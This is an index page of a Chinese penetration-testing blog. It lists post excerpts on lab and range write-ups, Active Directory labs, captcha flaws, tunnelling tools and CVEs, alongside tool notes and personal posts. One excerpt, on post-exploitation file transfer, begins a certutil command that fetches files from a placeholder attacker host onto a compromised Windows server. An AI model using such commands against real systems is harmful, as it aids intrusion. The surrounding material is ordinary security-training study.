banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
cover
cover
cover
cover
cover
cover
cover

mac arm版安卓app抓包环境设置

mumu 模拟器下载后,先进行如下设置 mumu 模拟器版本 1.4.11 开启可写系统盘 开启 root 权限 安装 adb Copy brew install android-platform-tools 查看 adb 的连接端口 列出模拟器设备 Copy adb…
cover
cover
cover
cover

tmux使用记录

tmux是一个终端复用器类自由软件,功能类似GNU Screen,但使用ISC许可证发布。用户可以通过tmux 在一个终端内管理多个分离的会话,窗口及面板,对于同时使用多个命令行,或多个任务时非常方便。
cover
cover
cover
cover
cover
cover
cover

终端多路复用器screen工具使用记录

这是特别有用的工具,尤其是在需要长期运行进程或者在远程会话中保持会话不被断开的情况下。screen可以让开启的应用程序在后台运行。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

后渗透之文件传输及下载

拿到了服务器之后,就需要上传工具,或者从服务器下载文件,针对不同的场景(网络环境)可能需要用到不同的文件下载工具,平常打靶场也能用得到,这里就简单记录下。 windows Copy certutil -urlcache -split -f "http://<LHOST…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

验证码模块常见的一些漏洞

验证码主要用在登陆表单中进行登陆验证,防止表单被暴力破解。如果验证码模块设置不当,如客户端验证、服务端验证码不过期等,验证码就形同虚设。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜 仿真靶场-time记录

Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜靶场--Certify记录

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD) part 1 侦查和扫描

前言 最近家里的电脑有时间打开了,就开始做下 GOAD 靶场实验,GOAD 靶场的 writeup 先根据作者的流程走,后期学完可以做些自我理解及补充。 环境搭建参考之前的博客:https://lca.xlog.app/game-of-active-directoryGOAD…
cover

常见端口相关可利用的漏洞

cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

ATT&CK红队评估实战靶场-1

靶场来自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 简单的一个靶场,本来用作学生的考核的,但是没用到,横向的域渗透也只是用了 cobalt strike 上的 psexec 模块,主要的内容是熟悉一些渗透的流程。 靶场有…
cover

《德米安:彷徨少年时》阅读笔记

值得读的一本书,少年时的彷徨每个人都有过,而一个重要的领路人也是很重要。
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

渗透测试从js文件中如何获取敏感信息

对网站的javascript文件进行分析,查找js文件中是否存在敏感信息,有的开发者会将接口、url、参数、accesskey等信息放在js文件中,所以就可以分析js文件查找这些内容。
cover

网络安全名词介绍

刚好要整理一个网络安全名词介绍的课程,参考网络安全中的常用名词,内容基于 gpt 生成。 POC (Proof of Concept) 中文(概念验证),是指验证某个安全漏洞、攻击方式或者技术的可行性的代码或者操作方法。POC 通常用于证明攻击可以成功…
cover
cover
cover
cover
cover
cover

chisel代理工具

chisel是一款基于 HTTP 的快速 TCP/UDP 隧道
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD)域环境搭建

Game Of Active directory的第二个版本,项目地址:https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例(三个 DC,两个普通域内主机),拓朴图如下: 官…
cover
cover
cover
cover
cover
cover
cover
cover

2022年十大被利用的漏洞

CVE-2021-44228(Log4Shell) CVE-2021-44228 是一款广受欢迎的 Apache Log4j 开源日志实用程序中的远程代码执行漏洞。 复现记录,之前 notion 中记录了apache log4j2 漏洞复现 CVE-2022-30190…
cover
cover
cover
cover
cover
cover
cover

告别2023

跨年简简单单去外面吃了个饭,广场太多人了,回来直接鼻塞➕嗓子干,在外面尽量带着口罩。 2023 年最后一天读完了黑塞的《德米安:彷徨少年时》,这本书讲辛克莱尔进入学校面对的不安和困惑的世界时显得彷徨,德米安的出现,改变了这一现状,拯救了辛克莱尔,并在以后的成长中…
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜仿真靶场Hospital实操

在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机。
Ownership of this blog data is guaranteed by blockchain and smart contracts to the creator alone.